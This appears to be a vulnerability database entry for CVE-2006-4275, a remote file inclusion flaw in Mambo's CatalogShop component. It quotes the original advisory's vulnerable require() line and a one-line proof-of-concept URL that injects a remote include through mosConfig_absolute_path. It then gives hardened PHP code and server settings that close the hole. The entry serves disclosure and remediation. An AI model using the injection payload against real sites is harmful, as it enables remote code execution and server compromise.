Mambo CatalogShop Component 'catalogshop.php' Remote File Inclusion Vulnerability

Vulnerability ID 1193763 Vulnerability type Input validation
Published 2006-08-21 Updated 2006-08-26
CVE number CVE-2006-4275 CNNVD-ID CNNVD-200608-348
Vulnerability platform N/A CVSS score 7.5
|Vulnerability source
https://cxsecurity.com/issue/WLB-2006080142
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200608-348
|Vulnerability details
The catalogshop.php script of the CatalogShop component (com_catalogshop) for Mambo has a PHP remote file inclusion vulnerability: a remote attacker can execute arbitrary PHP code by supplying a URL in the mosConfig_absolute_path parameter.
|Vulnerability EXP
########################################################################
#                      Aria-Security.net Advisory                      #
#                      Discovered by: O.U.T.L.A.W                      #
#                      < www.Aria-security.net >                       #
#             Gr33t to: A.U.R.A & Hessam-X & Cl0wn & DrtRp             #
########################################################################

#Software: Mambo CatalogShop

#Attack method: Remote File Inclusion

#Description : This is a modified version of the FacileForms mambot, which allows you to add and view user comments and ratings below content in the categories setup in xtdratings. Just publish it!

#Source:

# Variables - Don't change anything here!!!

require($mosConfig_absolute_path."/administrator/components/com_catalogshop/config.catalogshop.php");

************************************************************************

#Proof of Concept:

#http://www.site.com/catalogshop.php?mosConfig_absolute_path=shell

#----------------------------------------------------------

#Contact : Outlaw (at) aria-security (dot) net [email concealed]
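The root cause in the quoted require() line is that $mosConfig_absolute_path is an ordinary global: when catalogshop.php is requested directly (outside Mambo's index.php front controller) the variable is still unset, and with register_globals enabled PHP populates it from the query string, so request data becomes the prefix of an include path. The following is an added example, not code from the CatalogShop component or the Mambo project: it places the vulnerable pattern from the advisory beside a hardened replacement. The _VALID_MOS guard is the real Mambo convention for blocking direct access; the directory layout (three levels below the Mambo root) and the helper name catalogshop_safe_include_path are assumptions for illustration.

```php
<?php
// Added example, not the CatalogShop component's own code.
//
// Vulnerable pattern (as quoted in the advisory):
//
//   require($mosConfig_absolute_path."/administrator/components/com_catalogshop/config.catalogshop.php");
//
// Hardened replacement, in three independent layers.

// 1. Refuse direct access. Mambo's front controller defines _VALID_MOS before
//    it loads a component; a request that hits this file directly never has it,
//    so the include below can only run inside a normal Mambo page load.
defined('_VALID_MOS') or die('Direct Access to this location is not allowed.');

// 2. Derive the base directory from this file's own location instead of from a
//    global that request data can overwrite under register_globals.
//    Assumed layout: <mambo root>/components/com_catalogshop/catalogshop.php
$catalogshop_base = dirname(dirname(dirname(__FILE__)));

// 3. Resolve the include target and check that it is a local file under the
//    base directory. A scheme prefix ("http://", "ftp://", "php://") or a
//    traversal sequence never survives this check.
function catalogshop_safe_include_path($base, $relative)
{
    // Reject anything that looks like a URL wrapper outright.
    if (strpos($relative, '://') !== false) {
        return false;
    }
    $base = realpath($base);
    $full = realpath($base . '/' . ltrim($relative, '/'));
    if ($base === false || $full === false || !is_file($full)) {
        return false;
    }
    // realpath() has collapsed any "../" segments; the result must still sit
    // inside the base directory.
    if (strpos($full, $base . DIRECTORY_SEPARATOR) !== 0) {
        return false;
    }
    return $full;
}

$config_file = catalogshop_safe_include_path(
    $catalogshop_base,
    'administrator/components/com_catalogshop/config.catalogshop.php'
);
if ($config_file === false) {
    die('CatalogShop configuration file not found.');
}
require $config_file;
```

The first layer alone closes the hole as reported, because the guard runs before the include; the second and third remove the dependence on a request-influenced global entirely, so the file stays safe even if a later code change calls it from an unexpected path. On the server side, register_globals=Off takes away the mechanism that turns a query parameter into $mosConfig_absolute_path, and allow_url_fopen=Off (or allow_url_include=Off on PHP 5.2 and later) stops require() from fetching remote URLs at all; both are worth verifying in phpinfo() on any host that still runs Mambo-era components.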
|References

Source: BID
Name: 19604
Link: http://www.securityfocus.com/bid/19604
Source: BUGTRAQ
Name: 20060819MamboCatalogShopRemoteFileInclusion
Link: http://www.securityfocus.com/archive/1/archive/1/443758/100/0/threaded
Source: XF
Name: catalogshop-absolutepath-file-include(28462)
Link: http://xforce.iss.net/xforce/xfdb/28462
Source: SREASON
Name: 1433
Link: http://securityreason.com/securityalert/1433